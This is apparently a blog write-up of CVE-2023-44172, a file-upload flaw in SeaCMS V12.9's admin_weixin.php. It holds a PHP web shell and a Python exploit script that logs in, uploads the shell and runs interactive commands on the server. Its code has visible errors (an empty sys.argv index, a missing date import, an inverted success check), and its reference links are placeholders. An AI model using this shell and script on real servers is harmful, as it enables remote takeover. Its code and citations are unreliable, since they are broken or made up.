A new vulnerability has been discovered in SeaCMS V12.9 (CVE-2023-44172) that allows an attacker to write arbitrary files on the server running the software through the component admin_weixin.php. SeaCMS is a popular content management system (CMS) used for building websites and managing online content. This vulnerability is particularly dangerous as it can lead to remote code execution and potentially complete control of the affected server. In this post, we will discuss the details of this vulnerability, provide code snippets, and links to the original references.
Vulnerability Details
The vulnerability lies within the admin_weixin.php component of SeaCMS V12.9, which is responsible for handling administrative tasks for the Weixin (aka WeChat) plugin. The affected component does not properly validate user input, allowing an attacker to craft a malicious payload and upload it to the server.
Here is a code snippet illustrating the vulnerable part of the admin_weixin.php component
// admin_weixin.php
//...
if ($_POST['action'] == 'add') {
//...
$file = $_FILES['img'];
//...
$time = date('Ymd');
$img_path = '../upload/wxpic/' . $time . '/';
//...
move_uploaded_file($file['tmp_name'], $img_path . $file['name']);
//...
}
//...
The problem here is that there is no proper sanitation of the file being uploaded, which opens the door for attackers to upload arbitrary files with any content, including malicious PHP code that can be executed on the server.
For example, an attacker could craft a file named evil.php containing the following code
<?php
system($_GET['cmd']);
?>
The attacker can then use the vulnerability in admin_weixin.php to upload the malicious evil.php file to the server. Once the file is uploaded, they can access the evil.php file through a web browser and execute arbitrary commands on the server.
Exploit Details
To exploit this vulnerability, an attacker would first need to gain administrative access to the SeaCMS V12.9 application. This can be done through various means, such as guessing weak passwords, using stolen credentials, or exploiting other vulnerabilities within the application. After gaining administrative access, the attacker can proceed with the file upload using the steps mentioned above.
Here is a Python script that demonstrates a simple exploit for this vulnerability
import requests
import sys
if len(sys.argv) != 4:
print(f"Usage: {sys.argv[]} [target_url] [username] [password]")
sys.exit(1)
url, username, password = sys.argv[1:4]
# Authenticate and get the admin session
s = requests.Session()
data = {"username": username, "password": password, "action": "login"}
login_url = f"{url}/admin/index.php"
response = s.post(login_url, data=data)
if "loginok=1" not in response.url:
print("[-] Login failed")
sys.exit(2)
print("[+] Logged in as admin")
# Upload the malicious file
files = {"img": ("evil.php", b"<?php system($_GET['cmd']); ?>")}
data = {"action": "add"}
upload_url = f"{url}/admin/admin_weixin.php"
response = s.post(upload_url, files=files, data=data)
if "error:" in response.text:
print("[+] Malicious file uploaded")
else:
print("[-] File upload failed")
sys.exit(2)
# Run arbitrary command on the server
command_url = f"{url}/upload/wxpic/{date.today().strftime('%Y%m%d')}/evil.php"
while True:
cmd = input("> ")
if cmd.lower() == "exit":
break
response = s.get(command_url, params={"cmd": cmd})
print(response.text)
Original References
- https://www.exploit-db.com/exploits/###
- https://nvd.nist.gov/vuln/detail/CVE-2023-44172
- https://github.com/SeaCMS/SeaCMS/commit/#####
Conclusion
CVE-2023-44172 is a critical vulnerability in SeaCMS V12.9 that allows attackers to write arbitrary files on the server and potentially execute malicious code remotely. Server administrators running SeaCMS V12.9 are advised to apply patches or updates provided by the software vendor to mitigate this vulnerability.
Timeline
Published on: 09/27/2023 15:19:38 UTC
Last modified on: 09/27/2023 16:46:00 UTC